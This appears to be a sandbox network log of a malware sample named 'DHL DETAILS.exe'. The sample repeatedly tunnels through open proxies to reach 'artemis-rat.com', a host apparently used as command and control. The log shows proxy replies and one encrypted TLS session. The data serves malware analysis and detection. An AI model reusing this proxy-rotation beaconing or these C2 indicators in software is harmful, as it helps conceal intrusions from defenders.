Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
346	192.168.2.5	50910	91.134.140.160	49687	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.468400955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.223684072 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.333098888 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
347	192.168.2.5	51161	51.79.87.144	54395	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.468511105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
348	192.168.2.5	50972	45.120.178.197	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.468609095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
349	192.168.2.5	50932	185.81.153.162	3389	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.468657970 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
350	192.168.2.5	50989	43.131.248.165	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.469099998 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
351	192.168.2.5	51236	104.17.171.79	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.469475985 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.624007940 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
352	192.168.2.5	50938	222.223.103.232	7302	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.469544888 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:13.819322109 CET	90	IN	HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 55

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
353	192.168.2.5	51244	185.238.228.202	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.469634056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.624159098 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
354	192.168.2.5	51181	184.60.66.122	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.469687939 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.706624031 CET	1286	IN	HTTP/1.1 302 Found Date: Sat, 09 Mar 2024 12:14:13 GMT Server: Apache/2.4.56 (Debian) Location: https://artemis-rat.com:443/index.php Content-Length: 3214 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 75 65 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 76 6e 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 69 63 6f 6e 22 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 50 20 43 6f 6d 70 75 74 69 6e 67 20 43 6f 6e 63 65 70 74 73 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 6c 69 62 2f 64 70 63 63 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 55 62 75 6e 74 75 3a 34 30 30 2c 33 30 30 2c 37 30 30 2c 35 30 30 2c 34 30 30 69 74 61 6c 69 63 25 37 63 44 69 64 61 63 74 2b 47 6f 74 68 69 63 3a 73 75 62 73 65 74 3d 6c 61 74 69 6e 2d 65 78 74 25 37 63 4d 75 6c 69 3a 34 30 30 2c 34 30 30 69 74 61 6c 69 63 2c 33 30 30 69 74 61 6c 69 63 2c 33 30 30 25 37 63 41 6d 69 6b 6f 3a 34 30 30 2c 37 30 30 22 0d 0a 20 20 20 20 20 20 20 20 20 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 40 35 2e 31 2e 33 2f 64 69 73 74 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 0d 0a 20 20 20 20 20 20 20 20 20 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 31 42 6d 45 34 6b 57 42 71 37 38 69 59 68 46 6c 64 76 4b 75 68 66 54 41 55 36 61 75 55 38 74 54 39 34 57 72 48 66 74 6a 44 62 72 43 45 58 53 55 31 6f 42 6f 71 79 6c 32 51 76 5a 36 6a 49 57 33 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 40 35 2e 31 2e 33 2f 64 69 73 74 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 6b 61 37 53 6b 30 47 6c 6e 34 67 6d 74 7a 32 4d 6c 51 6e 69 6b 54 31 77 58 67 59 73 4f 67 2b 4f 4d 68 75 50 2b 49 6c 52 48 39 73 45 4e 42 4f 30 4c 52 6e 35 71 2b 38 6e 62 54 6f 76 34 2b 31 70 22 0d Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"/> <meta name="MobileOptimized" content="width"/> <meta name="HandheldFriendly" content="true"/> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <link rel="shortcut icon" href="/favicon.ico" type="image/vnd.microsoft.icon"/> <title>DP Computing Concepts</title> <link rel="stylesheet" href="/lib/dpcc.css"> <link href="https://fonts.googleapis.com/css?family=Ubuntu:400,300,700,500,400italic%7cDidact+Gothic:subset=latin-ext%7cMuli:400,400italic,300italic,300%7cAmiko:400,700" media="all" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous"></head><body> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p"
Mar 9, 2024 13:14:13.706799984 CET	1286	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 Data Ascii: crossorigin="anonymous"></script> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script><header> <div class="row mt-2"> <div class="col-sm-auto"> <a href="http:
Mar 9, 2024 13:14:13.708079100 CET	844	IN	Data Raw: 69 6e 67 20 62 61 73 69 63 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 61 6c 20 63 6f 6e 64 69 74 69 6f 6e 73 20 66 6f 72 20 67 72 6f 77 69 6e 67 20 0d 0a 20 61 67 72 69 63 75 6c 74 75 72 61 6c 20 70 72 6f 64 75 63 74 73 20 73 75 63 68 20 61 73 20 67 72 Data Ascii: ing basic environmental conditions for growing agricultural products such as grapes. These sensors are capable of remotely monitoring temperature, humidity, light levels, and soil moisture levels. The sensor readings are transmitted wire

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
355	192.168.2.5	51054	104.249.29.74	5767	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.469767094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.943782091 CET	459	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization." Proxy-Connection: close X-Webshare-Error: 407 X-Webshare-Reason: invalidpassword Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Length: 121 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
356	192.168.2.5	49960	92.205.110.118	7895	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.469831944 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
357	192.168.2.5	51267	172.67.182.22	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.469871044 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.624119043 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
358	192.168.2.5	51002	8.222.152.158	55555	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.473535061 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.161231995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
359	192.168.2.5	51061	18.185.169.150	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.479291916 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.783744097 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:13 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
360	192.168.2.5	51196	162.243.102.207	9764	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.482276917 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
361	192.168.2.5	51031	43.155.130.182	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.487087965 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
362	192.168.2.5	50911	103.190.54.141	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.495651960 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.161726952 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:17.200654030 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 97 c2 51 8b 25 55 b1 dd 26 aa c3 c8 d4 ce 9f 87 eb 89 9e 85 51 71 f8 25 bd f2 a7 b2 d8 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eRQ%U&Qq%*,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:17.945190907 CET	1286	IN	Data Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ec 52 99 b9 8d fc 22 e8 a9 c3 75 b3 c8 1f b5 63 fa df 55 a7 2e a3 f0 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00 Data Ascii: C?eR"ucU.DOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
Mar 9, 2024 13:14:17.945322990 CET	1286	IN	Data Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7 Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5\|0F<Arp'~00tP'S"0*H0G10UUS
Mar 9, 2024 13:14:17.945364952 CET	1286	IN	Data Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?'>#ZB-z6=`9cxN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
Mar 9, 2024 13:14:18.359647989 CET	736	IN	Data Raw: 30 02 86 1d 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 74 30 32 06 03 55 1d 1f 04 2b 30 29 30 27 a0 25 a0 23 86 21 68 74 74 70 3a 2f 2f 63 72 6c 2e 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e Data Ascii: 0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_\|W&o[Fh7okz7%QhIZ
Mar 9, 2024 13:14:18.429214954 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 18 73 d2 8e 88 07 79 95 ca 2e a8 d6 a6 ed 6f 6b 8a ae 87 dc 49 29 36 af 10 a7 a6 63 83 3e 31 7b 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 f1 76 ed da 82 75 6f 69 59 34 50 08 d1 64 50 70 bb 30 6a ac 69 Data Ascii: %! sy.okI)6c>1{(vuoiY4PdPp0ji89
Mar 9, 2024 13:14:18.920175076 CET	258	IN	Data Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1f 00 c0 5a 17 6c fc 96 79 f4 13 45 84 8d 90 63 af ff 94 81 b1 16 65 16 d3 bb 36 46 a1 28 87 f2 1a 3b 6d ce b0 60 5b 60 5a a9 4a f1 d2 23 f2 2f ea 69 1c 39 24 69 50 1f 61 53 11 af a3 6c 2e 37 58 3d 12 ef b0 3d Data Ascii: ZlyEce6F(;m`[`ZJ#/i9$iPaSl.7X== Ry7&_twEU]K-1=E'\|7%A (uAn%YqB2#*?%{P-g\/t,Np-{xh_f(I@GV
Mar 9, 2024 13:14:18.963643074 CET	252	OUT	Data Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 da ef ca 2e 3e 09 f5 a6 26 22 c2 9d 8b a8 23 52 bd 92 e0 c2 88 a7 ae 6e 6e 09 8b 6c 4a 9c a4 c8 32 27 be a6 f3 d4 6b 7a 69 e7 c0 b0 47 a4 8d 28 70 11 8a e6 67 7e 1a 8f b8 2e b7 5f 1e 4c 4a c3 aa 32 ae 98 78 Data Ascii: .>&"#RnnlJ2'kziG(pg~._LJ2x(`wE3]qW2iZv4[z-Wd5AN'p=]:a5,eZjX[X3?*ETgTB<svmKObI
Mar 9, 2024 13:14:19.460541964 CET	1286	IN	Data Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 93 d5 bc 33 23 d1 68 c3 d9 0b 38 9c b3 e6 ff a3 b9 76 3e 8b c2 cd 55 ea 39 c1 b5 36 71 fc 7c 86 fb b6 e3 38 f6 2e 61 fd c2 ed 6e 0d ea 80 04 64 d3 ad 22 1f 7b dd 46 64 13 d6 b6 a6 d6 2e 1f 3b 43 06 9d 84 ca Data Ascii: q3#h8v>U96q\|8.and"{Fd.;C%Q(Na,>5z9~q[c\|eR5HY7{eIqRB?k3;2&N`#FE2E0@uk4+-?~5oQ5
Mar 9, 2024 13:14:19.460551023 CET	112	IN	Data Raw: 49 0d 4f 06 a3 c6 b5 21 99 03 b2 7e ae db d4 69 09 74 73 b2 dd aa 1a 88 d6 10 e9 d7 52 79 b7 39 1d b6 20 c8 ae 93 ad ed 36 e5 b5 bc 1b 75 ae 3e f7 5f 6a 53 c1 b3 94 81 43 27 12 d3 ad 59 56 16 e8 af b5 d1 e5 3e 4b 0f 02 4a 2f 8a dd f2 4a 6e 52 a0 Data Ascii: IO!~itsRy9 6u>_jSC'YV>KJ/JnR0s;b'l`Q.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
363	192.168.2.5	51001	93.90.212.2	4153	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.496090889 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
364	192.168.2.5	49949	171.250.222.13	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.503602028 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
